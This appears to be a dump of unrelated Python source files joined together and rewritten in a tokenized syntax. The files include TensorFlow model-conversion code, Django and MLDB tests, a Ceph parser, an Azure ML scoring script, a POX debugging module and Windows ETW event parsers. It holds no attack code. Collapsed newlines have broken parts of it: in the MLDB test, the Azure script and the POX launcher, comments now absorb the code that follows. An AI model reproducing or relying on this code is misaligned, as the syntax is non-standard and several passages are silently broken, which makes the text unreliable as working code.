<block_start><if_stmt>args.coreml<block_start><import_from_stmt>convert.convert_to_core_ml convert_localization<line_sep>frozen_model=".tmp/coreml_frozen_model.pb"<line_sep>graph=strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Preprocessor/sub"] output_node_names=["Squeeze" "Postprocessor/convert_scores"] )<line_sep>anchors=get_anchors(graph)<line_sep>convert_localization(frozen_model=frozen_model labels_path=labels_path output_path=args.mlmodel_path anchors=anchors )<block_end><block_end>@attempt_conversion("object detection" "TensorFlow Lite")<def_stmt>convert_object_detection_tflite <block_start><if_stmt>args.tflite<block_start><import_from_stmt>convert.convert_to_tflite convert_localization<line_sep>frozen_model=".tmp/tflite_frozen_model.pb"<line_sep>graph=strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Preprocessor/sub"] output_node_names=["Squeeze" "Postprocessor/convert_scores"] )<line_sep>anchors=get_anchors(graph)<line_sep>convert_localization(frozen_model=frozen_model labels_path=labels_path output_path=args.tflite_path anchors=anchors )<block_end><block_end>@attempt_conversion("object detection" "TensorFlow.js")<def_stmt>convert_object_detection_tfjs <block_start><if_stmt>args.tfjs<block_start><import_from_stmt>convert.convert_to_tfjs convert_localization<line_sep>frozen_model=".tmp/tfjs_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=[] output_node_names=["Postprocessor/ExpandDims_1" "Postprocessor/Slice"] )<line_sep>convert_localization(frozen_model=frozen_model labels_path=labels_path output_path=args.tfjs_path )<block_end><block_end><block_end>################################################################################ # Classification ################################################################################ 
<if_stmt>args.model_type<eq>"classification"<block_start>labels_path=os.path.join(args.saved_model "labels.txt")<line_sep>@attempt_conversion("classification" "Core ML")<def_stmt>convert_classification_coreml <block_start><if_stmt>args.coreml<block_start><import_from_stmt>convert.convert_to_core_ml convert_classification<line_sep>frozen_model=".tmp/coreml_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Placeholder"] output_node_names=["final_result"] )<line_sep>convert_classification(frozen_model=frozen_model labels_path=labels_path output_path=args.mlmodel_path )<block_end><block_end>@attempt_conversion("classification" "TensorFlow Lite")<def_stmt>convert_classification_tflite <block_start><if_stmt>args.tflite<block_start><import_from_stmt>convert.convert_to_tflite convert_classification<line_sep>frozen_model=".tmp/tflite_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Placeholder"] output_node_names=["final_result"] )<line_sep>convert_classification(frozen_model=frozen_model labels_path=labels_path output_path=args.tflite_path )<block_end><block_end>@attempt_conversion("classification" "TensorFlow.js")<def_stmt>convert_classification_tfjs <block_start><if_stmt>args.tfjs<block_start><import_from_stmt>convert.convert_to_tfjs convert_classification<line_sep>frozen_model=".tmp/tfjs_frozen_model.pb"<line_sep>strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Placeholder"] output_node_names=["final_result"] )<line_sep>convert_classification(frozen_model=frozen_model labels_path=labels_path output_path=args.tfjs_path )<block_end><block_end><block_end>
<import_from_stmt>django.urls reverse<import_from_stmt>..links.document_file_links link_document_file_delete link_document_file_download_quick <import_from_stmt>..links.favorite_links link_document_favorites_add link_document_favorites_remove <import_from_stmt>..links.trashed_document_links link_document_restore<import_from_stmt>..models TrashedDocument<import_from_stmt>..permissions permission_document_file_delete permission_document_file_download permission_document_view permission_trashed_document_restore <import_from_stmt>.base GenericDocumentViewTestCase<import_from_stmt>.mixins.favorite_document_mixins FavoriteDocumentTestMixin<class_stmt>FavoriteDocumentLinkTestCase(FavoriteDocumentTestMixin GenericDocumentViewTestCase)<block_start><def_stmt>test_favorite_document_add_link_no_permission self<block_start>self._create_test_document_stub()<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_add.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_add_link_with_access self<block_start>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub permission=permission_document_view)<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_add.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_add_link_external_user_with_access self<block_start>self._create_test_user()<line_sep>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub 
permission=permission_document_view)<line_sep>self._test_document_favorite_add(user=self.test_user)<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_add.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_remove_link_no_permission self<block_start>self._create_test_document_stub()<line_sep>self._test_document_favorite_add()<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_remove.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_remove_link_with_access self<block_start>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub permission=permission_document_view)<line_sep>self._test_document_favorite_add()<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_remove.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<block_end><def_stmt>test_favorite_document_remove_link_external_user_with_access self<block_start>self._create_test_user()<line_sep>self._create_test_document_stub()<line_sep>self.grant_access(obj=self.test_document_stub permission=permission_document_view)<line_sep>self._test_document_favorite_add(user=self.test_user)<line_sep>self.add_test_view(test_object=self.test_document)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_favorites_remove.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><block_end><class_stmt>DocumentsLinksTestCase(GenericDocumentViewTestCase)<block_start><def_stmt>test_document_file_delete_link_no_permission 
self<block_start>self._upload_test_document_file()<line_sep>self.assertTrue(self.test_document.files.count() 2)<line_sep>self.add_test_view(test_object=self.test_document.files.first())<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_delete.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_document_file_delete_link_with_permission self<block_start>self._upload_test_document_file()<line_sep>self.assertTrue(self.test_document.files.count() 2)<line_sep>self.grant_access(obj=self.test_document permission=permission_document_file_delete)<line_sep>self.add_test_view(test_object=self.test_document.files.first())<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_delete.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<line_sep>self.assertEqual(resolved_link.url reverse(viewname=link_document_file_delete.view args=(self.test_document.files.first().pk )))<block_end><def_stmt>test_document_file_download_link_no_permission self<block_start>self.add_test_view(test_object=self.test_document.file_latest)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_download_quick.resolve(context=context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_document_file_download_link_with_permission self<block_start>self.grant_access(obj=self.test_document permission=permission_document_file_download)<line_sep>self.add_test_view(test_object=self.test_document.file_latest)<line_sep>context=self.get_test_view()<line_sep>resolved_link=link_document_file_download_quick.resolve(context=context)<line_sep>self.assertNotEqual(resolved_link <none>)<line_sep>self.assertEqual(resolved_link.url reverse(viewname=link_document_file_download_quick.view args=(self.test_document.file_latest.pk )))<block_end><block_end><class_stmt>TrashedDocumentsLinksTestCase(GenericDocumentViewTestCase)<block_start><def_stmt>setUp 
self<block_start>super().setUp()<line_sep>self.test_document.delete()<line_sep>self.test_trashed_document=TrashedDocument.objects.get(pk=self.test_document.pk)<line_sep>self.add_test_view(test_object=self.test_trashed_document)<line_sep>self.context=self.get_test_view()<block_end><def_stmt>test_trashed_document_restore_link_no_permission self<block_start>resolved_link=link_document_restore.resolve(context=self.context)<line_sep>self.assertEqual(resolved_link <none>)<block_end><def_stmt>test_trashed_document_restore_link_with_permission self<block_start>self.grant_access(obj=self.test_document permission=permission_trashed_document_restore)<line_sep>resolved_link=link_document_restore.resolve(context=self.context)<line_sep>self.assertNotEqual(resolved_link <none>)<line_sep>self.assertEqual(resolved_link.url reverse(viewname=link_document_restore.view args=(self.test_trashed_document.pk )))<block_end><block_end>
""" ceph_insights - command ``ceph insights`` ========================================= """<import_stmt>json<import_stmt>re<import_from_stmt>.. CommandParser parser<import_from_stmt>insights.specs Specs<line_sep>@parser(Specs.ceph_insights)<class_stmt>CephInsights(CommandParser)<block_start>""" Parse the output of the ``ceph insights`` command. Attributes: version (dict): version information of the Ceph cluster. data (dict): a dictionary of the parsed output. The ``data`` attribute is a dictionary containing the parsed output of the ``ceph insights`` command. The following are available in ``data``: * ``crashes`` - summary of daemon crashes for the past 24 hours * ``health`` - the current and historical (past 24 hours) health checks * ``config`` - cluster and daemon configuration settings * ``osd_dump`` - osd and pool information * ``df`` - storage usage statistics * ``osd_tree`` - osd topology * ``fs_map`` - file system map * ``crush_map`` - the CRUSH map * ``mon_map`` - monitor map * ``service_map`` - service map * ``manager_map`` - manager map * ``mon_status`` - monitor status * ``pg_summary`` - placement group summary * ``osd_metadata`` - per-OSD metadata * ``version`` - ceph software version * ``errors`` - any errors encountered collecting this data The ``version`` attribute contains a normalized view of ``self.data["version"]``. 
Examples: >>> ceph_insights.version["release"] == 14 True >>> ceph_insights.version["major"] == 0 True >>> ceph_insights.version["minor"] == 0 True >>> isinstance(ceph_insights.data["crashes"], dict) True >>> isinstance(ceph_insights.data["health"], dict) True """<line_sep>IGNORE_RE=["\*\*\* DEVELOPER MODE" "\d+-\d+-\d+.+WARNING: all dangerous"]<line_sep>bad_lines=["module 'insights' is not enabled" "no valid command found"]<def_stmt>__init__ self *args **kwargs<block_start>kwargs.update(dict(extra_bad_lines=self.bad_lines))<line_sep>super(CephInsights self).__init__(*args **kwargs)<block_end><def_stmt>_sanitize_content self content<block_start>"""Remove lines matching IGNORE_RE at start of content"""<line_sep>slice_point=0<line_sep>ignore_re=re.compile('|'.join(CephInsights.IGNORE_RE))<for_stmt>line content<block_start><if_stmt><not>line<or>ignore_re.match(line)<block_start>slice_point<augadd>1<line_sep><continue><block_end><break><block_end><return>content[slice_point:]<block_end><def_stmt>_parse_version self<block_start>""" Add a Ceph version property as a dictionary with the keys "release", "major", "minor" containing numeric values, and the key "full" with the full version string. If Ceph is not compiled with verison information (this should never be the case in a production system), then "release", "major", and "minor" are set to None. """<line_sep>self.version={"release":<none> "major":<none> "minor":<none>}<line_sep>self.version.update(self.data["version"])<block_end><def_stmt>parse_content self content<block_start>content=self._sanitize_content(content)<line_sep>self.data=json.loads(''.join(content))<line_sep>self._parse_version()<block_end><block_end>
# # Copyright (C) 2018 Pico Technology Ltd. See LICENSE file for terms. #
# # MLDB-1104-input-data-spec.py # mldb.ai inc, 2015 # This file is part of MLDB. Copyright 2015 mldb.ai inc. All rights reserved. # <import_stmt>unittest<import_stmt>datetime<import_stmt>random<import_from_stmt>mldb mldb ResponseException<class_stmt>InputDataSpecTest(unittest.TestCase)<block_start>@classmethod<def_stmt>setUpClass cls<block_start>cls.load_kmeans_dataset()<line_sep>cls.load_classifier_dataset()<block_end>@classmethod<def_stmt>load_kmeans_dataset cls<block_start>kmeans_example=mldb.create_dataset({"type":"sparse.mutable" 'id':'kmeans_example'})<line_sep>now=datetime.datetime.now()<for_stmt>i range(100)<block_start>val_x=float(random.randint(-5 5))<line_sep>val_y=float(random.randint(-5 5))<line_sep>row=[['x' val_x now] ['y' val_y now]]<line_sep>kmeans_example.record_row('row_%d'%i row)<block_end>kmeans_example.commit()<block_end><def_stmt>train_kmeans self training_data<block_start>metric="euclidean"<line_sep>mldb.put("/v1/procedures/kmeans" {'type':'kmeans.train' 'params':{'trainingData':training_data 'centroidsDataset':{'id':'kmeans_centroids' 'type':'embedding' 'params':{'metric':metric}} 'numClusters':2 'metric':metric}})<block_end><def_stmt>train_svd self training_data<block_start>mldb.put("/v1/procedures/svd" {'type':'svd.train' 'params':{'trainingData':training_data 'runOnCreation':<true>}})<block_end>@classmethod<def_stmt>load_classifier_dataset cls<block_start>dataset=mldb.create_dataset({"type":"sparse.mutable" "id":"iris_dataset"})<with_stmt>open("./mldb/testing/dataset/iris.data")<as>f<block_start><for_stmt>i,line enumerate(f)<block_start>cols=[]<line_sep>line_split=line.split(',')<if_stmt>len(line_split)<ne>5<block_start><continue><block_end># Jemery's what if a feature is named label cols.append(["label" float(line_split[0]) 0])# sepal length cols.append(["labels" float(line_split[1]) 0])# sepal width cols.append(["petal length" float(line_split[2]) 0])<line_sep>cols.append(["petal width" float(line_split[3]) 
0])<line_sep>cols.append(["features" line_split[4].strip('\n"') 0])#class dataset.record_row(str(i+1) cols)<block_end><block_end>dataset.commit()<block_end><def_stmt>train_classifier self training_data<block_start>result=mldb.put("/v1/procedures/classifier" {'type':'classifier.train' 'params':{'trainingData':training_data "configuration":{"type":"decision_tree" "max_depth":8 "verbosity":3 "update_alg":"prob"} "modelFileUrl":"file://tmp/MLDB-1104.cls" "mode":"categorical" "functionName":"classifier_apply" 'runOnCreation':<true>}})<line_sep><return>result.json()<block_end><def_stmt>test_train_kmeans self# KMEANS TRAIN PROCEDURE WITH BOTH TYPE OF INPUT DATA <block_start>self.train_kmeans('select * from kmeans_example')<line_sep>self.train_kmeans('select x + y as x, y + x as y from kmeans_example')<line_sep>self.train_kmeans({'select':'*' 'from':{'id':'kmeans_example'}})<line_sep># TEST ERROR CASE <with_stmt>self.assertRaises(ResponseException)<block_start>self.train_kmeans('select x, y from kmeans_example group by x')<block_end><with_stmt>self.assertRaises(ResponseException)<block_start>self.train_kmeans('select x, y from kmeans_example group by x having y > 2')<block_end><block_end><def_stmt>test_train_svd self<block_start>self.train_svd('select * from kmeans_example')<line_sep>self.train_svd('select x, y from kmeans_example')<line_sep>self.train_svd('select x AS z, y from kmeans_example')<line_sep>self.train_svd('select * EXCLUDING(x) from kmeans_example')<line_sep>self.train_svd({'select':'*' 'from':{'id':'kmeans_example'}})<line_sep>self.train_svd('select x + 1, y from kmeans_example')<with_stmt>self.assertRaises(ResponseException)<block_start>self.train_svd('select x, y from kmeans_example group by x')<block_end><with_stmt>self.assertRaises(ResponseException)<block_start>self.train_svd('select x, y from kmeans_example group by x having y > 2')<block_end><block_end><def_stmt>test_train_classifier self<block_start>mldb.log(self.train_classifier("select {label, 
labels} as features, features as label "<concat>"from iris_dataset"))<line_sep>result=mldb.get("/v1/query" q="SELECT classifier_apply({{label, labels} as features}) as *, features from iris_dataset")<line_sep>rows=result.json()<line_sep>mldb.log("-------------------------------")<line_sep>mldb.log(rows)<line_sep># compare the classifier results on the train data with the original # label count=0<for_stmt>row rows<block_start>_max=0<line_sep>category=""<for_stmt>column row['columns'][1:4]<block_start><if_stmt>column[1]<g>_max<block_start>_max=column[1]<line_sep># remove the leading scores. and quotation marks category=column[0][10:-3]<block_end><block_end><if_stmt>category<ne>row['columns'][0][1]<block_start>count<augadd>1<block_end><block_end># misclassified result should be a small fraction self.assertTrue(float(count)/len(rows)<l>0.2 'the classifier results on the train data are strangely low')<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>mldb.run_tests()<block_end>
# pylint: disable=no-self-use,invalid-name <import_stmt>numpy<import_from_stmt>numpy.testing assert_almost_equal<import_stmt>keras.backend<as>K<import_from_stmt>deep_qa.tensors.similarity_functions.dot_product DotProduct<class_stmt>TestDotProductSimilarityFunction<block_start>dot_product=DotProduct(name='dot_product')<def_stmt>test_initialize_weights_returns_empty self<block_start>weights=self.dot_product.initialize_weights(3 3)<assert_stmt>isinstance(weights list)<and>len(weights)<eq>0<block_end><def_stmt>test_compute_similarity_does_a_dot_product self<block_start>a_vectors=numpy.asarray([[1 1 1] [-1 -1 -1]])<line_sep>b_vectors=numpy.asarray([[1 0 1] [1 0 0]])<line_sep>result=K.eval(self.dot_product.compute_similarity(K.variable(a_vectors) K.variable(b_vectors)))<assert_stmt>result.shape<eq>(2 )<assert_stmt>numpy.all(result<eq>[2 -1])<block_end><def_stmt>test_compute_similarity_works_with_higher_order_tensors self<block_start>a_vectors=numpy.random.rand(5 4 3 6 7)<line_sep>b_vectors=numpy.random.rand(5 4 3 6 7)<line_sep>result=K.eval(self.dot_product.compute_similarity(K.variable(a_vectors) K.variable(b_vectors)))<assert_stmt>result.shape<eq>(5 4 3 6)<line_sep>assert_almost_equal(result[3 2 1 3] numpy.dot(a_vectors[3 2 1 3] b_vectors[3 2 1 3]) decimal=6)<block_end><block_end>
""" Common constants for Pipeline. """<line_sep>AD_FIELD_NAME='asof_date'<line_sep>ANNOUNCEMENT_FIELD_NAME='announcement_date'<line_sep>CASH_FIELD_NAME='cash'<line_sep>CASH_AMOUNT_FIELD_NAME='cash_amount'<line_sep>BUYBACK_ANNOUNCEMENT_FIELD_NAME='buyback_date'<line_sep>DAYS_SINCE_PREV='days_since_prev'<line_sep>DAYS_SINCE_PREV_DIVIDEND_ANNOUNCEMENT='days_since_prev_dividend_announcement'<line_sep>DAYS_SINCE_PREV_EX_DATE='days_since_prev_ex_date'<line_sep>DAYS_TO_NEXT='days_to_next'<line_sep>DAYS_TO_NEXT_EX_DATE='days_to_next_ex_date'<line_sep>EX_DATE_FIELD_NAME='ex_date'<line_sep>NEXT_AMOUNT='next_amount'<line_sep>NEXT_ANNOUNCEMENT='next_announcement'<line_sep>NEXT_EX_DATE='next_ex_date'<line_sep>NEXT_PAY_DATE='next_pay_date'<line_sep>PAY_DATE_FIELD_NAME='pay_date'<line_sep>PREVIOUS_AMOUNT='previous_amount'<line_sep>PREVIOUS_ANNOUNCEMENT='previous_announcement'<line_sep>PREVIOUS_BUYBACK_ANNOUNCEMENT='previous_buyback_announcement'<line_sep>PREVIOUS_BUYBACK_CASH='previous_buyback_cash'<line_sep>PREVIOUS_BUYBACK_SHARE_COUNT='previous_buyback_share_count'<line_sep>PREVIOUS_EX_DATE='previous_ex_date'<line_sep>PREVIOUS_PAY_DATE='previous_pay_date'<line_sep>SHARE_COUNT_FIELD_NAME='share_count'<line_sep>SID_FIELD_NAME='sid'<line_sep>TS_FIELD_NAME='timestamp'<line_sep>
<import_stmt>os<import_stmt>json<import_stmt>time<import_stmt>torch<line_sep># Called when the deployed service starts <def_stmt>init <block_start><global>model<line_sep><global>device<line_sep># Get the path where the deployed model can be found. model_filename='obj_segmentation.pkl'<line_sep>model_path=os.path.join(os.environ['AZUREML_MODEL_DIR'] model_filename)<line_sep>device=torch.device('cuda')<if>torch.cuda.is_available()<else>torch.device('cpu')<line_sep>model=torch.load(model_path map_location=device)<block_end># Handle requests to the service <def_stmt>run data<block_start><try_stmt><block_start>start_at=time.time()<line_sep>inputs=json.loads(data)<line_sep>img_data_list=inputs["instances"]<line_sep>img_tensor_list=[torch.tensor(item)<for>item img_data_list]<line_sep>model.eval()<with_stmt>torch.no_grad()<block_start>predictions=model([item.to(device)<for>item img_tensor_list])<block_end>pred_data_list=[{"masks":prediction['masks'][0 0].mul(255).byte().cpu().numpy().tolist() "boxes":prediction['boxes'].numpy().tolist() "labels":prediction['labels'].numpy().tolist() "scores":prediction['scores'].numpy().tolist() }<for>prediction predictions]<line_sep><return>{"predictions":pred_data_list "elapsed_time":time.time()-start_at}<block_end><except_stmt>Exception<as>e<block_start>error=str(e)<line_sep><return>error<block_end><block_end>
# Copyright 2012 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Primitive help for debugging deadlocks. Prints stack info for all threads. (Might be more useful if it only printed stack frames that were not changing, sort of like recoco_spy.) This was initially factored out from a pox.py modification by <NAME>. """<import_stmt>sys<import_stmt>time<import_stmt>inspect<import_stmt>traceback<import_stmt>threading<import_from_stmt>pox.core core<import_stmt>os<line_sep>base_path=__file__<line_sep>base_path=os.path.split(base_path)[0]<line_sep>base_path=os.path.split(base_path)[0]<line_sep>base_path<augadd>os.path.sep<def_stmt>fmt_tb tb<block_start>f=tb.filename<if_stmt>f.startswith(base_path)<block_start>f=f[len(base_path):]<block_end>l="%s:%i"%(f tb.lineno)<line_sep>code=tb.code_context<if_stmt>code<block_start>code=code[0].strip()<block_end><if_stmt><not>code<block_start>code="<Unknown>"<block_end><return>"%20s: %s"%(l code)<block_end><def_stmt>_trace_thread_proc <block_start><try_stmt><block_start><while_stmt>core.running<block_start>frames=sys._current_frames()<for_stmt>key frames<block_start>frame=frames[key]<line_sep>print(fmt_tb(inspect.getframeinfo(frame)))<line_sep>outer_frames=inspect.getouterframes(frame)<for_stmt>i range(0 len(outer_frames))<block_start>print(" "+fmt_tb(inspect.getframeinfo(outer_frames[i][0])))<block_end><block_end>time.sleep(5)<block_end><block_end><except_stmt><block_start>traceback.print_exc()<block_end><block_end><def_stmt>launch 
<block_start>_trace_thread=threading.Thread(target=_trace_thread_proc)<line_sep>_trace_thread.daemon=<true><line_sep># Start it up a bit in the future so that it doesn't print all over # init messages. core.callDelayed(3 _trace_thread.start)<block_end>
<import_from_stmt>apps.flow.settings config<if_stmt>config.SERVER_ENV<ne>'dev'<block_start><import_from_stmt>gevent monkey<line_sep>monkey.patch_all()<block_end><else_stmt><block_start><pass><block_end><import_from_stmt>apps.flow.views.deploy deploy<import_from_stmt>apps.flow.views.flow flow<import_from_stmt>library.api.tFlask tflask<def_stmt>create_app <block_start>app=tflask(config)<line_sep>register_blueprints(app)<line_sep><return>app<block_end><def_stmt>register_blueprints app<block_start>app.register_blueprint(flow url_prefix="/v1/flow")<line_sep>app.register_blueprint(deploy url_prefix="/v1/deploy")<block_end><if_stmt>__name__<eq>'__main__'<block_start>create_app().run(port=config.PORT)<block_end>
# -*- coding: utf-8 -*- """ Microsoft-Windows-SecurityMitigationsBroker GUID : ea8cd8a5-78ff-4418-b292-aadc6a7181df """<import_from_stmt>construct Int8sl Int8ul Int16ul Int16sl Int32sl Int32ul Int64sl Int64ul Bytes Double Float32l Struct<import_from_stmt>etl.utils WString CString SystemTime Guid<import_from_stmt>etl.dtyp Sid<import_from_stmt>etl.parsers.etw.core Etw declare guid<line_sep>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1003 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1003_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1004 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1004_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1005 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1005_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1006 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1006_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ACGState"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1007 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1007_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1008 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1008_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1009 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1009_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul 
"ProcessId"/Int32ul "ACGState"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1010 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1010_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1011 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1011_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1012 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1012_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1013 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1013_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1014 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1014_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1015 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1015_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1016 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1016_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1017 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1017_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") 
event_id=1018 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1018_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1019 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1019_0(Etw)<block_start>pattern=Struct("DriverId1"/Int64ul "DriverId2"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1020 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1020_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1021 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1021_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul "ErrorCode"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1022 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1022_0(Etw)<block_start>pattern=Struct("Description"/WString "VendorId"/Int32ul "DeviceId"/Int32ul "DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1023 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1023_0(Etw)<block_start>pattern=Struct("Description"/WString "VendorId"/Int32ul "DeviceId"/Int32ul "DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1024 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1024_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1025 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1025_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul 
"ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1026 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1026_0(Etw)<block_start>pattern=Struct("Description"/WString "VendorId"/Int32ul "DeviceId"/Int32ul "DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1027 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1027_0(Etw)<block_start>pattern=Struct("DriverId"/Int64ul "ProcessId"/Int32ul)<block_end>@declare(guid=guid("ea8cd8a5-78ff-4418-b292-aadc6a7181df") event_id=1030 version=0)<class_stmt>Microsoft_Windows_SecurityMitigationsBroker_1030_0(Etw)<block_start>pattern=Struct("ModuleName"/WString)<block_end>
